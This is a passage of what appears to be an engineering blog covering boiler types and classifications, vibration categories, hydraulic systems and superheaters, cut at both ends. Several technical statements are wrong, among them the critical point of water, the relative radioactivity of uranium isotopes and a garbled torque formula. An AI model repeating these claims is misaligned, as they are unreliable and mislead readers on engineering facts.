the next development, boiler began to be designed more complex. The boiler center-flue is the beginning of the birth of a fire-tube boiler, because the combustion gas is flowed into the water tank through a large pipe before being discharged into the outside air. The flue gas pipe only has one direction away from the furnace. This boiler is popular after being used as the first locomotive engine. This boiler is quite good at the side of the exhaust gas flow because of the use of the chimney. However, it is not very efficient if it is used to burn too much fuel such as wood or coal. • • Return-flue Boiler Boiler return-flue is a further development of the center-flue type. If the center-flue uses one exhaust gas pipeline, then the exhaust gas pipe in the return-flue boiler is made to have a U-shaped backflow. The purpose of this design is to further improve boiler efficiency. Boilers that developed in the early 19th century were used as locomotive machines to replace boiler center-flue that were not very efficient. (Credit: Wikipedia: Flued Boiler) • Huber Boiler The Huber boiler became the first fire-tube boiler to be more complex than several types of boilers before. This boiler has not used one large pipe as a return channel for exhaust gas, but has used several small pipes or tubes in order to maximize heat transfer from the flue gas to the water in the tank. The shape of the exhaust gas channel after exiting the combustion chamber also has a better design. The design makes gas distribution to be maximized to all pipelines. • Cornish boiler Another development of a fire-tube boiler design is the Cornish Boiler. This boiler is a horizontal boiler with a natural draft system, so it requires a high chimney shape to ensure adequate oxygen supply. This boiler is made from a large water tank with the combustion chamber right in the middle. Flanked by a brick building, such that the flow of combustion gases coming out of the combustion chamber in the middle of the tank will flow back along the outer edge of the tank. Next the brick building will direct the exhaust gas to traverse a passageway under the tank, before finally passing through the chimney and out into the atmosphere. For more details, let’s look at the picture on the side, top and front of this Cornish boiler. • Butterley Boiler Butterley boilers are the development of the Cornish boiler, which initially aimed to accommodate the needs of boilers in the northern United States which are rich in coal with lower calorific value than the southern mainland. This boiler is similar to the Cornish boiler design but by removing the exhaust gas lines under the water tank. • Lancashire boiler The Cornish boiler also has another fire-tube boiler design derivative called the Lancashire Boiler. If the Cornish boiler has only one combustion chamber and at the same time one large fire pipe in the middle of a water tank, then the Lancashire boiler has two combustion chambers that are simultaneously two fire-pipes in the middle of a water tank. The boiler developed by William Fairbairn in 1844 tried to adjust the Cornish boiler design when using coal fuel in the Lancashire area on the English plain, which tends to be difficult to burn in small boilers. • Locomotive Boiler The Locomotive Boiler becomes the first complex fire-tube boiler. Even this boiler is still often encountered today. Boilers that are named according to their use as a train driving machine are designed to produce superheater steam. The water vapor will be directly used as a piston drive on a steam engine that is designed to blend into the Locomotive boiler system. This boiler has also been designed to have a lot of medium sized fire pipes that are smaller than fire pipes in the Center-Flue and Return-Flue Boilers, so that it will increase the transfer of heat energy from the combustion gas to the water. An important component of the Locomotive Boiler is the presence of a superheater steam valve that is inside a section called the dome. This one-way valve will only open by superheater steam when it reaches a certain pressure. Furthermore, the superheater steam will enter into a steam piston driving medium. • Scotch Marine Boiler The Scotch Marine boiler is the most popular fire-tube boiler design used even today. This boiler was originally made to meet the needs of steam in marine engines. Even the legendary Titanic ship uses a total of 29 Scotch Marine boilers. Scotch Marine boilers have high efficiency. This is obtained because the design of the fire pipe in the water tank is very much. Hot gas from the combustion process comes out of the combustion chamber in the middle of the water tank, towards the fire pipes which are next to the combustion chamber with the opposite direction of flow. Then the exhaust gas flows back to the fire pipes on the upper side with the direction of the direction of the direction of combustion in the combustion chamber. In short, the flow of combustion gases inside the fire pipes seemed to form the letter S. • Vertical Fire-tube Boiler Fire-tube boilers that are vertically areanged, known as vertical fire-tube boilers. This type of boiler has design advantages and the manufacturing process is not too complicated. The combustion chamber is under a water tank, with pipes for exhaust gas lines arranged vertically in the water tank. • Horizontal Tubular Return Boiler The Horizontal Return Tubular Boiler is similar to other fire-tube boilers that we have discussed. Has a flat arrangement of fire pipes. What is slightly different is the design of the placement of a combustion chamber that is not in a water tank, but is under the tank. The fire pipes in the tank will only be passed by hot exhaust gas from the combustion of fuel in the combustion chamber. This fire-tube boiler is unpopular and has not been used by many since its appearance in the Ironclad warship era in the mid-19th century. One thing that made it unpopular was the design of the fire pipe that was connected directly to the combustion chamber so that over-heat was often occured on the pipe. • Immersion Fired Boiler This last fire-tube boiler has one characteristic that is not haved by other fire-tube boilers. The boiler developed by the Sellers Manufacturing manufacturer is designed so that each fire pipe in the water tank functions as a combustion chamber as well as a hot exhaust gas from the combustion process. So that this boiler has a lot of burners (burners) with an amount equal to the number of existing fire pipes. With an automatic boiler design that is only suitable for using liquid or gas fuels, it is claimed to have a relatively low temperature voltage. This boiler is still marketed to date by the manufacturer Sellers Manufacturing as the owner of the patent design. 2. Water-Tube Boiler Water-tube boilers have a reverse design with fire-tube boilers. This boiler circulates water through the pipelines with a heat source coming from the furnace. A water tank commonly called a steam drum is one of the characteristics of a water-tube boiler. Steam drum serves as a water tank that is maintained at a certain level to ensure there is always circulating water to the water pipes. Besides that, the steam drum is also to separate steam from water-steam mixture inside the drum. Wet steam coming out of the steam drum will be heated further to produce superheated steam. The popular water-tube boiler design is using the water pipes as the combustion chamber wall (wall tube). The water from the steam drum drops through a downcomer pipe to a header pipe connected to all the lower ends of the wall-tube pipe. The other wall-tube end that is at the top of the combustion chamber is directly connected to the steam drum. In this part of the wall tube, the phase changes from water to water vapor. This water-tube system produces a closed-loop circulation between the steam drum-downcomer-wall tube-and returns to the steam drum. From the steam drum, only saturated steam will come out. Even water-tube boilers have slightly more complex designs than fire-tube boilers, but water-tube boilers tend to be able to produce higher quality steam (more superheated). Therefore, water-tube boilers are more suitable to be applied in large industries that are more demanding of high quality steam such as steam power plants. Based on different designs, water-pipe boilers can be classified as follows: • John Blakey Boiler (1766) This boiler designed by John Blakey became the forerunner of the water tube boiler. This boiler is composed of a vertical funace with several connected pipes inside, which are made tilted to form a certain angle. The two ends of the pipe are connected to a smaller pipe. This boiler was patented by John Blakey in 1766, but not too popular at the time. • James Rumsey Boiler (1788) The first functional water-tube boiler was created by a mechanical engineer from the United States, James Rumsey. He is known to patent several water-tube boiler designs, making James Rumsey touted as the inventor of the water-tube boiler. One of the most famous designs is a steam-powered boat. The boat, which was then made to cross the Potomac River, was equipped with a water-tube boiler. The water tube in the boiler are twisted horizontally, inside a large enough furnace. The steam produced is used to drive a steam piston. The steam piston, using a single shaft, is connected to another piston underneath it. The second piston serves as a water pump, with water from the river as the media where the boat operates. The piston shaft, also connected to a large pendulum. The pendulum is connected to an injector pump and an air pump on the condenser. Steam that enters the steam piston will lift the shaft, so that the water piston also lifted, and sucks the water of the river into the piston cylinder. When the piston reaches the top dead centre, a knob on the shaft will touch a stick mechanism, so the control valve will change its position. When the control valve changes its position, the steam inside the cylinder will be pushed out and enter the condenser. The water piston will also be pushed down, so the water comes out of the cylinder, passing through the nozzle on the back of the ship, thus creating a force for the ship. When the shaft position down, the injector pump pushes the river water into the boiler, while the air pump pushes the water inside the condenser to exit. • Julius Griffith Boiler (1821) This boiler has a fairly simple design, but has a significant impact on the development of the next water-tube boiler design. This boiler was designed by Julius Griffith in 1821, which is composed of several horizontal pipes in several levels and placed inside the heat source. The horizontal pipes are connected to the twin vertical pipes on either side. At the very end, there is a last horizontal pipe as a gathering place for steam produced, which then comes out of the boiler. This top horizontal pipeline design will next to be the forerunner of the design of the steam drum in modern water-tube boilers. • Joseph Eve Boiler (1825) The first sectional water-tube boiler with well-defined circulation was designed by Joseph Eve in 1825. This boiler composed of several vertical pipes with curve variations in the center of the pipe, two larger horizontal pipes as a water reservoir and a steam reservoir, as well as two large external vertical pipes as a circulating pipe between the steam reservoir on the upper side and the water reservoir on the lower side. These two vertical pipes have a function to ensure good natural circulation of water and steam inside the boiler system between the water pipes, reservoirs and external pipes. • Goldsworthy Gurney Boiler (1826) The Gurney water-tube boiler design was patented in 1825, first made in 1826, and tested in 1827 by Simon Goodrich. This boiler is composed of several U shaped pipes laid with one side in the top position. Each end of the U pipe is interconnected with a horizontal pipe with a larger diameter, both top and bottom. Then these two horizontal pipes are connected with vertical pipes to ensure the occurrence of water-steam circulation. There is also a long and large diameter cylindrical tube, vertically standing connected to the upper and lower horizontal pipes. This cylindrical pipe serve as a water reservoir and water vapor. • Stephen Wilcox Boiler (1856) This Wilcox design boiler became the first water-tube boiler to use inclined pipe design. These tilted pipes connect the water spaces on the front and back, with the steam room at the top. This boiler design later developed into Babcock & Wilcox boiler design, and dominated the water-tube boiler market in the late 19th to early 20th centuries. • Spiral Water-Tube Boiler If the fire-tube boiler develops along with the train development, the water-tube boiler design was developed in tandem with car technology. The birth of car technology in 1770 created by Nicolas-Joseph Cugnot, encouraged the development of cars in the 1800s that still use steam engines. Most of the car’s engines use spiral water tube boilers with different designs. Since then, spiral water tube boilers have developed into various uses. Spiral water tube boiler designs include Climax Boilers, Lune Valley Boilers, Monotube Boilers, The Baker Boiler, Ofeldt Boilers, and many others. • D-Type Boiler The first water-tube boiler type that we will discuss is called the D-type because the shape of the boiler is similar to the letter D. This boiler is equipped with two tanks namely the steam drum on the upper side and the mud drum (water tank) on the lower side. These two tanks are connected to many water pipes which are partially arranged vertically, and some are arranged in the shape of the letter D. In the middle of the D-shaped pipes has a functions as a combustion chamber. • Type-A Boiler Still because the design is similar to the form of one of the Latin letters, the A-type boiler is named so indeed because its design is similar to the letter A. This boiler has one steam drum but with two water tanks below. The purpose of using these two water tanks is to further extend the life of the boiler because the water pipe will be longer than the D-type design. This boiler has a slimmer design than a D-type boiler, however an A-type boiler cannot produce higher energy-containing steam than the D-type for the same dimensions. (Credit: Wikipedia: Package Boiler) • O-Type Boiler The O-type boiler is the last type of water-tube boiler whose design is similar to one of the letters. This O-shaped boiler has a symmetrical shape with the position of the above steam drum and water tank below. Both are connected with symmetrical water pipes so that in the middle become boiler combustion chambers. This O-type boiler is claimed to be able to produce water vapor faster than the D-type. The low maintenance requirements are also another advantage of this boiler. • Babcock & Wilcox Boiler As the name implies, the Babcock & Wilcox boiler was developed by a firm with the same name as the boiler. This boiler design was developed and patented in the mid-nineteenth century. This boiler has only one tank, the steam drum positioned at the top of the boiler. The steam drum is partly filled with water and the other part contains wet water vapor. The typical design of this boiler is water pipes that are designed to be tilted to form a 15 ° angle. This slope serves to ensure the occurrence of natural circulation of water-water vapor in the boiler. On top of the water pipes there is also a further hot steam pipe which functions to further heat water vapor that has been sufficiently hot and escaped from the steam drum to be further heated to achieve superheated quality. For the flow of combustion gases in the boiler is made tortuous so as to maximize absorption of heat from the flue gas to the water fluid. (Credit: Mech4Study) • Stirling Boiler The Stirling boiler is one of the predecessors of the water-tube boiler. These boilers were popularly used in the early 1900s, and are very difficult to find at this time. This boiler has the characteristics of using two kinds of water tanks, steam drum at the top with an amount that is always more than the second tank, the water tank at the bottom of the boiler. Characteristics of the design make the Stirling Boiler can be classified based on the number of water tanks, there are three tanks with two steam drums and one water tank, four tanks with three steam drums and one water tank, and five tanks in the form of three steam drums at the top and two water tanks at the bottom of the boiler. The more number of tanks, the higher ability to produce steam. However, this boiler is old-fashioned and is no longer used because it has relatively lower efficiency values ​​than modern boilers. Boiler Stirling Tiga Tanki (Credit: Wikipedia: Stirling Boiler) Boiler Stirling Empat Tanki Boiler Stirling Lima Tanki • Yarrow Boiler The Yarrow boiler is an important type of high pressure water-tube boiler. They were developed by Yarrow & Co. (London), and is widely used on ships, especially warships. Yarrow boiler design has the characteristics of a boiler with three water tanks: two tubes of straight water are arranged in a row of triangles with a single furnace between the two. A single steam drum is installed at the top between them, with a smaller water drum at the base of each bank. Circulation, both up and down, occurs in this same bank tube. Yarrow’s specialty is the use of straight tubes and also the circulation in both directions that occur entirely in the tube bank, and does not use external energy or we are familiar with natural circulation. Because of the characteristics of the three drums, Yarrow boilers have greater water capacity. Therefore, this type is commonly used in boiler applications for old warships. Its compact size makes it attractive for use in power generation units that can be transported during World War II. In order to be transported in its time, boilers and auxiliary equipment (fuel oil heaters, pump units, fans etc.), turbines and condensers are installed in their own carriages to be carried through the railroad tracks. • • Thornycroft boiler This boiler was designed by the ship manufacturer John I. Thornycroft & Company. The special design of this boiler is to use just one steam drum on the upper side, with three downcomers so that it is arranged similar to the M formation boiler. However, due to the design of several pipes that have sharp bending, it risks leaking quickly not only because of the possibility of thermal stress, but also because of its own difficulties when needing to be cleaned. Because of these weaknesses, this boiler is not as popular as Yarrow Boiler. • Tube-Walled Boilers In the early days of its development, water-tube boilers were not as fast developed as fire-pipe boilers. This is because water-tube boilers require more complex design calculations and manufacturing techniques. But the main advantages of fire-tube boilers that have almost no maximum capacity limit, making the development in the next period, only need to wait for the birth of modern welding and materials technologies. After electricity was discovered, then the construction of steam power plants began intensively in the early 20th century, the Stirling Boiler type still dominated. To meet this need, numbers of Stirling Boilers are built at once in parallel so they can produce more steam. Why isn’t the Stirling Boiler made larger, and bigger, so it can produce more steam? The main reason was the use of fire bricks as the boiler wall. Fire brick walls would certainly be troublesome if you have to be arranged too high, as well as widened, following the boiler design if you want to be enlarged. Beside that, this large-sized wall must be able to isolate the heat energy of the combustion chamber, to ensure maximum heat absorption in the boiler. Gradually, new innovations were born to replace fire brick walls. The advancement of pipeline material and welding technology are also driving the advancement of boiler wall technology. Tube and tile boiler walls, became the initial innovation of the boiler wall design revolution. Found in the 1920s, this boiler wall combines a 6 inch diameter pipe with 2.5 inch thick tiles or 4.5 inch thick fire brick. Tube and tiles are arranged alternately, and the outer side of the wall is insulated to maintain boiler efficiency. The existence of the tube in the boiler wall, has a function to cool the wall so that the thickness of the fire bricks can be reduced from the previous thickness which can reach 22 inches. Since that time, the boiler design continue to grow in both size and capacity. In the late 1920s and early 1930s, the appearance of the flat studded tube and the loose tube wall constructed boilers. This design was able to increase the absorption of boiler heat. So in those days, boilers that used those two designs were able to receive the highest heat generated from coal combustion. Large changes in the water-tube boiler wall design occurred in the late of 1950s and early 1960s. Since then, and are still used today, water-tube boiler walls made from long steel tube which arranged in a row and welded each other with certain widths of steel membrane bar between every tube. This design is much easier to fabricate because making every wall panels can be done at the workshop. Then the wall panels can be much easier to assemble when build the boiler. The process of building boilers has become much more practical, time-saving, and certainly effective in cost. Not only that, the main advantage of this boiler wall-tube design makes the water-tube boilers could be built even larger and bigger. Known this day, huge water-tube boilers are capable to produce superheated steam of more than 4,000 tons per hour. That’s the same as more than a thousand kilograms of steam produced by this boiler, every second. Again, in every second! • Once-Through Boiler Once-through boiler is a concept of water tube boiler that does not occur a non-vaporizing water circulation. That is, each water molecule only passes through the boiler pipes once. This concept greatly increases boiler efficiency because it is no longer requires a steam drum as a water and steam separator, so there is no need for additional boiler circulation pumps. This boiler concept is actually not new. The boiler design was once patented in 1824. But the first commercial application of this boiler could only be done in 1923, by a Czechoslovakia inventor, Mark Benson. At that time, Benson only could build 1.3 kg per second boiler capacity. The boilers built to fulfill orders from English Electric Co.. The boiler was originally designed to operate at critical steam pressures. However, due to the frequently damage of the pipeline, boiler operating pressure was then forced to be lowered. The once-through boiler continues to grow until now. Supercritical and ultra-supercritical boilers have used this concept. So even though this boiler is used in power plants with a capacity of 1000 MW, the efficiency can reach 46%. Classification of boilers based on water circulation method In water-tube boilers, the circulation of water in boiler pipes is important to pay attention. In addition to good boiler water circulation, it will increase boiler efficiency, water circulation is also important to maintain boiler durability. This is because the water in the boiler also as a cooling medium, delaying the water circulation, resulting high thermal stress on the pipe. Of course this is very avoided. Against this background, there are known two types of boilers based on the way of water circulation. Here are both: 1. Natural Circulation Boiler Boilers with natural water circulation do not use external energy to circulate water in boiler pipes. The water in this boiler is naturally circulated due to the pressure difference between low temperature water and high temperature. Naturally high temperature water will have a relatively lower density. Therefore, the water is getting hotter and the phase changes to steam, the more it will be pushed upwards. Because of this process, the water in the boiler pipes will be circulated. Boilers with natural circulation include Babcock & Wilcox boilers, Lancashire, Cochran boilers, locomotive boilers, and so on. Perbedaan Boiler Sirkulasi Natural dan Paksa (Credit: Wikipedia: Forced Circulation Boiler) 2. Forced Circulation Boiler Boilers with forced circulation, use additional pumps to help the circulation of water in the boiler. This type of boiler does not need to wait for water phase differentiation to be able to circulate water. With the help of external energy for the process of water circulation, the process of generating steam will not be limited by the size of the boiler. When compared, forced circulation boilers can produce twenty times more steam than natural circulation boilers that have the same volume size. Examples of forced circulation boilers include Benson boilers, La Mont boilers, Velox boilers, and so on. Classification of boilers based on their working pressure In accordance with technology advancements, the quality of boiler steam also continues to improve. The boiler designers believe that the higher steam pressure can be achieved, the boiler efficiency will be higher to. So the following are the classification of boilers based on the steam pressure produced: 1. Low-pressure boiler: This boiler produces 15-20 bar of steam. 2. Medium-pressure boiler: This boiler produces steam from 20 to 80 bars. 3. High-pressure boiler: This boiler produces steam pressure above 80 bar. 4. Sub-critical boiler: The critical point of a boiler is a condition where boiler steam reaches a temperature of 560 ° C at a pressure of 221 bar. If a boiler works below these conditions, the boiler is called a subcritical boiler. Typically subcritical boilers are designed to work at 160 bar and steam temperature of 540 ° C. 5. Supercritical boiler: If a boiler works above its critical point, the boiler is called a supercritical boiler. Supercritical boilers have better fuel efficiency than subcritical boilers. Supercritical boilers have a design efficiency value of around 45%. While subcritical boilers can only reach 38%. This is due to the impossibility of forming bubbles in the supercritical boiler cycle. As a result of the work pressure and temperature above the critical point, the water will not experiencing the nucleate boiling phase (the transition phase from liquid to vapor) and immediately changes the phase immediately to steam. One characteristic of supercritical boilers is that they do not use steam drum components which to separate water from wet steam at sub-critical boiler. 6. Ultra Supercritical boiler: The working point of the boiler which is high above the critical point, the boiler will be more efficient. To achieve this, more sophisticated and expensive boiler pipe material technology is needed. The last few decades have made possible the manufacture of the material in question, so that at present the boiler design has been able to reach the point of work very far above its critical point. The boiler that we know as the Ultra Supercritical (abbreviated as USC) has an operational point of around 260 bar and a temperature of 700 ° C. This modern boiler has a theoretical efficiency value of up to 50%. Classification of boilers based on their energy sources In accordance with technological advances as well, now there are so many sources of energy that can be used as a source of boiler heat. Boilers developed at the beginning of its history only used fossil fuels, now there are several boiler technologies that can use renewable energy. The following are among them: 1. Coal-Fired Boiler Coal is the most commonly used fuel in large capacity boilers, including in Indonesia. The price is cheap, abundant (especially in coal-producing countries including Indonesia), high heat values, a number of reasons for the use of coal as boiler fuel to date. The use of coal as boiler fuel requires special treatment not carried out on other types of boilers. Characteristic of solid coal, the average size of your fist, requires a grinding process before it is burned in the boiler combustion chamber. Of course this is the main objective to facilitate the burning of the coal. Not only that, the processing of coal boiler exhaust gas is also different from other boilers. This boiler exhaust gas contains ash, carbon dioxide, sulfur, to NOx. Some binding processes for these wastes also need to be considered. Like the use of Electrostatic Precipitator to bind ash, then use Flue-Gas Desulphurization to bind sulfur, to the use of staggered combustion technology to minimize the formation of NOx. The complexity of coal boiler design, makes the economics of these boilers not as good as oil-fired boilers if used on a small scale. Therefore, coal boilers are more widely used for subcritical to ultra-supercritical production scales. 2. Oil-Fired Boiler Oil-fired boilers are quite popular for small scale use only. This is due to a much simpler design than a coal-fired boiler. These boilers are generally fire-tube boiler, which only require the main component of the burner and the pipe network for the flow of fire (hot gas) which is made inside the water furnace. These boilers generally use diesel fuel, or commonly known as High Speed ​​Diesel (HSD). The simple design makes this boiler very suitable for the production of low pressure steam with low steam production capacity. 3. Nuclear Boiler As the name implies, nuclear boilers use nuclear technology as a source of heat energy. This boiler is very popular for use in nuclear power plants. In nuclear power boilers, the heat energy from the fission reaction inside a nuclear reactor is absorbed by the coolant material which can be gas, liquid, or even liquid metal, depending on the type of reactor. This cooling material then flows into the boiler and is used to heat water so that it changes phase to further steam. The steam that is produced is channeled into turbines to generate electricity in nuclear power plants. The popular raw material for nuclear reactors is Uranium. Uranium is a type of heavy metal that is not very useful on Earth and is easily found in the oceans and rocks. There are two types of uranium with different isotopes that we know, namely uranium-238 (U-238) and uranium-235 (U-235). These two types of uranium have a major difference in their reactive age. U-238 has a longer reactive life than U-235, which also shows that U-235 is less radioactive than U-238. One major risk of using a nuclear reactor is of course the radioactive hazard. Therefore, nuclear reactors are always made in a dome that serves to prevent radioactive reactor leakage. Generally the outside of a nuclear reactor is made in a dome shape with strong concrete material which not only serves to prevent radioactive leakage, but also to resist natural disturbances from the outside. 4. Solar Concentrated Powered Boiler The boiler we will discuss next is very new technology. This boiler uses a very renewable source of energy from sunlight. Although sunlight is only available during the day, this boiler can operate 24 hours a day. Thanks to the special fluid called molten salt, that able to stored heat from the sunlight. Solar concentrated boilers use main component of large number of mirrors, arranged around a heat-receiver tower. The mirrors are positioned in such a way that the reflection of the sunlight captured by each mirror is reflected centrally to the heat-receiver tower. Each mirror component is equipped with an automatic mechanism, so that it can move following the sun, so that the direction of the sunlight reflection always leads to the heat-receiver tower. A mechanism is used to circulate the molten salt into a heat-receiver tower. It is estimated that the heat caught in this tower can reach 1500 times hotter than what we normally feel. The heat is absorbed by the molten salt and stored in a special thermal storage tank. Then, through a heat exchanger, the water absorbs the heat from the molten salt so that the water boils and reaches the superheat temperature. In concentrated solar power plants, this steam is then used to rotate steam turbines and produce electricity. Many power plants that have used this technology are built in Spain, the United States, South Africa, India, and a little in China. 5. Waste-to-Energy Boiler Waste power boilers or also known as waste-to-energy boiler are the most environmentally friendly solution to two problems at once: garbage and fossil fuel crisis. Waste production that continues to increase every time becomes one of the energy sources that can be used as boiler fuel. Waste-to-energy boilers are not much different from other biomass boilers. First, the waste is brought to the facility. Then, the waste is sorted to remove recyclable and hazardous materials. The waste is then stored until it is time for burning. A few plants use gasification process, but most combust the waste directly because it is more efficient. The waste can be added to the boiler continuously or in batches, depending on the design of the plant. It is known that waste-to-energy boilers have a friendlier emission level than coal-fired boilers. This is due to the absence of sulfur pollutants as contained in coal. Biggest Waste-to-Energy Power Plant will be built in Shenzhen, Cina Waste-to-energy power plants have been used for more than two decades in Sweden. And now many have been built in China, the United States, and many other countries. ## Classification of Vibration Classification of Vibration – In general, vibrations can be classified into several ways: 1. Free and Forced Vibration Free Vibration. If a system is initialised with interference, so it vibrates by itself, then the vibration is called free vibration. No external force works on the system. The motion of back and forth of a pendulum is an example of free vibration. Forced Vibration. If a system is subjected to an external force (more precisely the repetitive force), then the vibrations that arise on the system is known as forced vibrations. The vibrations that arise on a working diesel engine is one example of forced vibration. If the frequency of an external force is exactly same as the vibration frequency of the system, a condition known as resonance occurs. Resonance is very dangerous. Damage from the structures of buildings, bridges, turbines, and airplane wings is often associated with the resonance of the vibrations. 2. Undamped and Dumped Vibration If there is no energy lost or dissipated due to friction or other resistance during vibration, then the vibration is known as Undamped Vibration. Whereas, if a vibration experiences a gradual reduction of energy, it is called Damped Vibration. In various systems, the value of the damping is so small that it is often disregarded for most engineering purposes. But also vice versa, there are other systems that put damping system into important components, shock absorber in vehicles for example. Consideration of damping becomes extremely important in analyzing vibratory systems near resonance. 3. Linear and Nonlinear Vibration If all the basic components of a vibration system the spring, mass, and damper behave linearly, the resulting vibration is known as Linear Vibration. However, if one or more of these basic components behaves nonlinearly, then the vibration is called Nonlinear Vibration. Differential equations are made to describe the behavior of linear and nonlinear vibration systems. If the vibrations are linear, the superposition principle applies, and the mathematical analysis technique is well developed. For nonlinear vibrations, the superposition principle becomes invalid, and the analytics technique becomes more difficult. Since all vibration systems tend to behave nonlinearly as oscillation amplitude increases, knowledge of nonlinear vibrations is more developed in handling practical vibration systems. 4. Deterministic and Random Vibration If the value or magnitude of the excitation (force or movement) acting on the vibration system is known at any given time, the excitation is called deterministic, and the resulting vibration is known as Deterministic Vibration. In some cases, excitation is nondeterministic or random; excitation values ​​at certain times can not be predicted. In this case, extensive excitation data may indicate some statistical regularity. Under these conditions it is possible to estimate averages such as the mean and mean square values of excitation. Examples of random excitation are wind speed, roughness of the road, and ground movement during an earthquake. If the excitation is random, the resulting vibration is called Random Vibration. In this case the vibration response of the system is also random; and that condition can only be explained through statistical calculations. ## What is Water-tube Boiler? What is Water-tube Boiler? – Water-tube boiler is a type of boiler with pipes containing circulated water, which is heated by a fire on the outer side of the pipe. The water-tube boiler has the opposite design with the fire-tube boiler. This boiler circulates water through the pipelines with the heat source coming from the furnace. These pipes, which become the water-vapor circulation pipes, are inside the combustion chamber blanket or the combustion hot gas duct. In modern water-tube boilers with large production loads, there are several parts of water pipes designed to be the walls of the boiler’s combustion chamber. The pipes are usually known by the term wall-tube. A water tank, commonly called a steam drum, is one of the water-tube boiler character. Steam drums serve as a water tank to ensure there is always enough water circulated to the water pipes. Otherwise, steam drum also serves to separate the saturated steam with water. Saturated steam coming out of the steam drum will be heated further to become superheated steam. Modern water-tube boiler, equipped with water pipes designed as the boiler walls (wall-tube). Water from the steam drum goes down through a pipe called downcomer to the header pipe (lower ring header) connected to all the lower ends of the wall-tube. The other end of the wall-tube at the top of the combustion chamber is directly connected to the steam drum. In the wall-tube, there is a phase change from water to steam. This water-pipe system produces a closed water circulation between the steam drum – downcomer – wall-tube and back to the steam drum. From steam drum only saturated steam will come out. In superheater boilers, the saturated steam will be heated further into superheated steam. Even though the water-tube boiler has a slightly more complex design than a fire-tube boiler, this boilers tend to be more capable of producing higher steam quality, as well as a much larger capacity. Hence the water-tube boiler is more suitable to be applied to large industries, such as steam power plants, that demand more quantity, as well as high steam qualities. ## Working Principle of Hydraulic System Working Principle of Hydraulic System – We are certainly familiar with the above heavy equipment. A lot of heavy work using this equipment. This equipment is designed to conquer heavy loads raised, or for the purpose of digging. The system used as a “fork” driver is a hydraulic system. Hydraulic system is a system that uses liquid fluid power to do a simple job. The hydraulic system is an application of the use of Pascal’s Law. Hydraulic machine, supply pressurized hydraulic fluid to a hydraulic motor or hydraulic cylinder to perform certain work. Hydraulic motors produce a rotating motion that can be used to rotate heavy loads such as pulleys, chains, etc. Hydraulic cylinders produce back and forth motions that are widely applied to heavy equipment, water gates (at dams for example), or also for large valves. Hydraulic fluid is controlled by flow control valve and passed through hydraulic tube. The hydraulic system can be simply explained through the picture above. The first image shows that by using a hydraulic system, it takes a smaller (F) force to be able to lift a larger load. F2 = F1 • (A2/A1) While the second picture explains the principle of using a hydraulic motor on a pulley. And it takes a smaller torque to be able to rotate pulleys with a larger load (large torque). Tmotor = Tmotor • (Vmotor/Vpompa) Hydraulic Circuit A hydraulic system consists of hydraulic pumps, pipelines, control valves, hydraulic fluid tanks, filters, actuators (cylinders or hydraulic motors), and other devices as a complement. The picture above illustrates a hydraulic system that works to drive hydraulic cylinder piston. The working fluid collected in the tank is pumped by a hydraulic pump so that it has specific pressures. Fluid flows to the solenoid valve, this valve regulates the movement of hydraulic cylinders. If the cylinder position lengthens (advance) then the solenoid valve will go to the left, so the fluid can push the piston forward. When the solenoid valve is directed to the right, the hydraulic cylinder will retract. At the time of movement in the cylinder, then there is some hydraulic fluid is wasted. This fluid returns to the tank through a special pipeline. The system above is not much different from the hydraulic system that has a piston actuator. It’s just that here the actuator is a hydraulic motor for its use of torque (torque). The solenoid valve adjusts the direction of rotation of the hydraulic motor. Unlike the more complicated electric motors required to be able to rotate in both directions, hydraulic motors are easier to apply when needed to rotate in both directions. ## What is Fire-Tube Boiler? What is Fire-Tube Boiler? – Do you remember what boiler mean? Boiler is a vessel that serves to heat water. In principle, a pan is also a boiler, but it’s not a boiler of this kind that we will discuss. Long ago, mechanical engineers created boilers by simply increasing the size of the ‘pan’. Then gradually they design the boiler with more complex again. One important principle is that larger surface contact between the heat source and the heated water, the more steam produced by the boiler in equal size. Then came the idea of ​​making pipelines in the gigantic ‘pan’, so the pipes flowed the fire – or at least the hot gases – through the amount of water housed by the giant ‘pan’. This is the forerunner of the fire-tube boiler. So the definition of a fire-tube boiler is one type of boiler that flows the heat of the combustion process into one or more pipes, which were inside a sealed container filled with water. Fire-tube boiler is the simplest type of boiler. This boiler can be applied from low to medium water steam requirements. This is possible because the design is not complicated as the water-tube boiler. The size of the fire-pipe boiler is also relatively smaller, and allows it to be moved very easily. That advantages make this boiler is very popular when developed in conjunction with the steam engine. In the 19th century until the beginning of 20th century, fire-tube boilers were developed massively to meet the transportation needs of the time. Steam locomotive, naval ships, and early models of cars, became the most sophisticated models of fire-tube boiler transportation in that period. As the name, the fire-tube boiler flows the hot gas to the water-coated tubes. Different pipeline designs from the various fire-tube boilers, are to maximize the heat absorption of the combustion gases. The water level inside the boiler tank, must be maintained to avoid overheating. On the other hand, this boiler is also equipped with a safety relief valve avoid the explosion from over pressure. Many types of fire-tube boilers are also equipped with advanced steam heating systems to produce superheated steam. Nevertheless, the fire-tube boiler has limited steam production of only 2500 kg/h with a maximum pressure of 10 bars only. ## Types of Superheater Boiler Types of Superheater Boiler – Superheater is a subcritical boiler component that serves to heat the saturated steam, at constant working pressure, so it becomes superheated steam. In its development since the beginning of the 20th century, along with various boiler design races, some engineering experts patented the design of different superheater. Here are the types of superheater boiler, according to the patents: Radiant superheater is a superheater positioned in the boiler’s combustion chamber, so the superheater pipes instantly absorb the radiant heat from the combustion inside the furnace. In modern water-tube boilers, these superheater radiant pipes are placed hanging over the top of the boiler furnace. These pipes will absorb the second greatest heat energy, after the wall tubes (raiser/evaporator tube). At radiant superheater, the more steam flows in the superheater pipes of radians, the steam temperature output are decreasing. 2. Convective Superheater As the name implies, the convective superheater is the superheater pipes of the boiler which placed in the flow of the flue gases that still contain heat. These convective superheater pipes will absorb heat from combustion exhaust gases convectionally. This concept aims primarily to maximize heat absorption from combustion. In contrast to the radian superheater, the characteristic of the convection superheater is that the more steam flows in the convection superheater pipes, the superheater steam temperature output increased. 3. Separately Fired Superheater Separately fired superheater is a superheater that is placed separately from the main boiler, which has own separate combustion system with the main boiler. This superheater design is not like the radians or convection types that still use the combustion heat inside the furnace, but instead put additional burners in the area of ​​superheater pipes. This type of superheater is not popularly used, and even tends to be extinct due to efficiency of combustion ratio with steam quality that is not better than other superheater types. 4. Combination Radiant and Convection Superheater The last superheater type is the most popular, and still applied today. This superheater simultaneously combines two opposite characteristics between radiant and convection superheater, resulting in more homogeneous superheated steam temperature output in various steam flow. The graph below will explain these characteristics. In modern subcritical boilers, the superheater component of radians is subdivided into several stages. As in the subcritical boiler diagram below for example, after passing the Primary Superheater which is a convection superheater, steam is streamed sequentially to the Platent Secondary Superheater, Intermediate Secondary Superheater, 